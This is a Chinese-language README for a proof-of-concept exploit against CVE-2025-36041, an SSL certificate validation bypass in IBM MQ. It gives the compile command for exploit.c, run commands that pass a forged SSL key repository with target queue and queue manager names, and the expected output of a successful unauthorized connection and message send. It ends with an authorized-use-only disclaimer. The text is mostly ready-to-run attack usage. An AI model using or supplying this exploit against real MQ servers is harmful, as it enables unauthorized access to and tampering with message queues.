本仓库包含针对 CVE-2025-36041 的概念验证(PoC)利用代码,该漏洞存在于 IBM MQ(消息队列)中,允许绕过 SSL 证书验证。通过注入伪造的 SSL 证书并使用定制的 MQCONNX 参数,可以建立未经授权的客户端与 IBM MQ 服务器的连接。
"Hello MQ")以确认利用成功。确保已安装 IBM MQ 客户端库,并正确设置环境变量(MQ_INCLUDE_PATH、MQ_LIB_PATH)。
gcc exploit.c argparse.c -o CVE-2025-36041 \
-I/path/to/mqm/include \
-L/path/to/mqm/lib -lmqm
./CVE-2025-36041 \
-p /path/to/fake/ssl \
-n TARGET.QUEUE.NAME \
-m QM1
参数说明:
-p, --path 伪造的 SSL KeyRepository 目录路径。-n, --name 要打开并发送消息的目标队列名称。-m, --qmgr 队列管理器名称。./CVE-2025-36041 -p ./fake_ssl_repo -n MY.QUEUE -m QM1
如果成功,你将看到:
[+] 开始连接到 IBM MQ...
[+] 使用伪造的 SSL 连接成功!
[+] 消息发送成功!
仅限授权渗透测试和教育用途。 未经授权使用此 PoC 可能违反当地法律法规。作者不对滥用行为承担任何责任。
作者: Byte Reaper CVE: CVE-2025-36041